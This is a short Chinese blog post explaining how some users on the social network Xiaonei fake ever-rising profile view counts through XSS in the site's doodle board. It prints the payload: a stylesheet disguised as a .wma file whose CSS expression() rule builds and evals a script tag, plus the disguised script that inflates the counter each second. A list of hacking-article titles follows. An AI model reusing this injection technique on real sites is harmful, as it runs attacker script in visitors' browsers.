|
本来不想提校内网的XSS来着,因为太多,没有提的必要。
不过最近室友争着问我为什么有的人的空间访问量已经达到了几千万(在百度这里相对比较容易,因为文章的访问也算在内。而校内网的不算,所以几百万算是天文数字了),而且数字还在以每秒钟若干的数据增长!所以这里也给大家看下。
懂XSS的好友知道,这里便是利用上XSS了。看了看他们的代码(涂鸦板),大致如下:
| 以下是引用片段: <link href="A308676992321RAT.wma" type="text/css" rel="stylesheet" /> <div class=addJs>A247165747728HOR.wma</div> |
其中A308676992321RAT.wma里的代码如下:
| 以下是引用片段: .addJs{ display:none; background:expression((this.innerHTML!="")?(((this.innerHTML=unescape("jsfile=document.createElement%28%27script%27%29;jsfile.src=%27"+this.innerHTML+"%27;document.body.insertAdjacentElement%28%27BeforeBegin%27,jsfile%29;"))&&(eval(this.innerHTML))&&(this.innerHTML=""))==null?'red':'green'):'blue'); } |
A247165747728HOR.wma里的代码如下:
| 以下是引用片段: function ChangeVcount() { var mc=28; var mcc=parseInt(getEl('vcount').innerText); mc+=mcc; getEl('vcount').innerText=mc; setTimeout("ChangeVcount()", 1000); return true ; } ChangeVcount(); |
| 完全解析网页后门和挂马 | 04-02 |
| 真实的网络攻击取证纪实 | 03-27 |
| 利用404错误页面挂马 | 03-21 |
| 解密风暴 | 03-21 |
| 社会工程学在黑客中的应用 | 01-02 |
| 轻轻松松解密各种网页木马 | 12-21 |
| SA权限无xp_cmdshell时取权限又一 | 12-14 |
| 实现无net.exe和net1.exe添加系统 | 10-26 |
| 用U盘轻松去除XP管理员密码 | 10-26 |
| 教你多种保护措施限用移动硬盘 | 10-09 |
| bat 延时执行命令 | 10-09 |
| phpwind的一个放后门的方式 | 10-09 |